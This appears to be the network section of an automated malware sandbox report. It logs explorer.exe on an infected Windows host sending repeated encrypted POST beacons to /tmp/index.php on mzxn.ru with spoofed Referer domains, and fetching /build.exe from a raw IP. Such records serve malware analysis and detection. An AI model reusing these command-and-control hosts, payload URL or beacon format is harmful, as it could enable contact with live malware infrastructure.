Jul 27, 2024 07:30:26.035672903 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fbuadeoajebihl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 218 Host: mzxn.ru
Jul 27, 2024 07:30:26.035703897 CEST	218	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 5e 52 e6 fb Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vu^Rn2Nz?2ySl]C1?MPKOL\"$2dk$XLb7^'.qM+
Jul 27, 2024 07:30:28.108861923 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:27 GMT Content-Type: text/html; charset=utf-8 Connection: close
Jul 27, 2024 07:30:28.109220982 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:27 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	51819	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:28.113473892 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lsufwulnegxqsvy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 354 Host: mzxn.ru
Jul 27, 2024 07:30:28.113485098 CEST	354	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 3d 25 a6 8a Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vu=%s"@v\|ooXY+GB+j\#&B`!&[50to-X]YN`>^^C>G5\/T~>oEI*{
Jul 27, 2024 07:30:29.630784988 CEST	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	51823	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:31.232561111 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bluhmqewincunud.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 365 Host: mzxn.ru
Jul 27, 2024 07:30:31.232561111 CEST	365	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 05 6b 2c 90 f4 76 0b 75 4a 55 a7 ba Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA ,[k,vuJUOacMk9(Rs1+v-G;US<?eM_Ofmy5\$WibY=Q(j.s*[k%_k^mv
Jul 27, 2024 07:30:32.774739027 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	51827	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:32.786647081 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://frvkldaekrdbt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 241 Host: mzxn.ru
Jul 27, 2024 07:30:32.786680937 CEST	241	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 65 0e d7 e2 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vueP Tq~%c]~z$Wjc(Eh+AE{_3FYwfx[lO%<L7#wBpJ:["AmVz
Jul 27, 2024 07:30:34.994401932 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Jul 27, 2024 07:30:34.994539022 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Jul 27, 2024 07:30:34.994759083 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	51831	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:35.026592016 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mqumylcqnaa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: mzxn.ru
Jul 27, 2024 07:30:35.026592016 CEST	301	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 51 2f c0 f6 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vuQ/jJU~um%DYvx{_-_2_.PFt[2tX7M3d?sA[I\|sY7!.2)t$vo^H*URL!
Jul 27, 2024 07:30:35.235809088 CEST	577	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mqumylcqnaa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: mzxn.ru Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 51 2f c0 f6 6a 4a e3 af 9a 55 7e 8b ae af 81 de 0d 75 c2 f9 8a a3 aa 6d dc e7 a6 25 dd 44 59 76 78 0b 7b e2 5f f2 2d 1a 86 a2 c5 df bf d8 5f 32 c4 84 dc 5f ed 2e 93 50 80 1a 94 46 74 5b b9 1f 32 c2 0c 74 58 37 c8 4d bf f5 a2 be 99 cd 83 cf dc 33 88 96 b2 0f 64 80 3f 73 bb 8c 41 9d 13 5b 49 e5 f3 db fb dd a0 95 80 98 d0 7c 73 aa ba cb 59 e7 b7 cd 37 98 21 df ea 94 8a 8d ba bf 8e 2e 32 99 bf e0 29 74 98 8e ee 24 76 90 f2 1f d8 6f 5e 48 ee 10 e6 bb ba 2a e5 c2 55 08 1c e0 52 02 b9 b4 4c 8f 21 0c f7 eb a2 cb ec 72 b9 dc fc 53 fb 16 88 33 62 8f aa b3 24 d8 2e 11 ea 31 5b 68 9a 60 7e 81 89 d6 2e bc 20 bf 54 a5 f7 36 8c 75 31 10 11 47 81 b3 56 4f a2 d3 73 f1 f3 33 5a Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vuQ/jJU~um%DYvx{_-_2_.PFt[2tX7M3d?sA[I\|sY7!.2)t$vo^H*URL!rS3b$.1[h`~. T6u1GVOs3Z
Jul 27, 2024 07:30:36.566144943 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	51833	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:36.583403111 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wvcpcwinaogm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 144 Host: mzxn.ru
Jul 27, 2024 07:30:36.583436966 CEST	144	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 46 17 c6 a2 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vuFW&nFe!IToZZbw{A!"f$T
Jul 27, 2024 07:30:38.095077991 CEST	188	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 33 08 a5 6f 58 b5 a9 16 a7 d0 b0 fb 70 db 2c c0 f1 2f 5e 5b 89 92 8a Data Ascii: #\([3oXp,/^[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	51838	109.172.114.212	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:38.273417950 CEST	162	OUT	GET /build.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 109.172.114.212

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	51858	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:59.625926018 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qtgvwwvtuns.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: mzxn.ru
Jul 27, 2024 07:30:59.625926018 CEST	313	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 75 48 b5 a8 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vuuHPAa\|+"C))NC3i1QN<%Pl4T(B-`rf2Ginv_OKC)\0$B{WOG\|"nF/HP<}
Jul 27, 2024 07:31:01.177618027 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:31:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	51895	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:32:10.996467113 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nrlmldyquiidbru.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: mzxn.ru
Jul 27, 2024 07:32:10.996495008 CEST	286	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 04 eb 97 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA .[k,vu_t\|J Hum)vPEZp7r$O7(nXSTy=y^OP)cTr.G4]KzioBp2x}`0#
Jul 27, 2024 07:32:12.538669109 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:32:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	51901	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:32:20.449021101 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iidaiysfdtd.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: mzxn.ru
Jul 27, 2024 07:32:20.449038982 CEST	330	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2d 54 da a2 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA .[k,vu-Tan]g7GL%](grf?b5HdY+;SavF8K6@M@)\|.Gl_U$EPlreSFwt2bbW:o
Jul 27, 2024 07:32:21.963623047 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:32:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	51908	177.222.41.236	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:32:33.655951977 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ggwxsequudqgaxcf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: mzxn.ru
Jul 27, 2024 07:32:33.655987024 CEST	323	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 3f fb af Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA .[k,vus?rXbY;@+1/H`zX +Q]RG=vDI.Nhq[W9mP2Ln'DFO\|c/;@d
Jul 27, 2024 07:32:34.909446955 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:32:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	51914	177.222.41.236	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
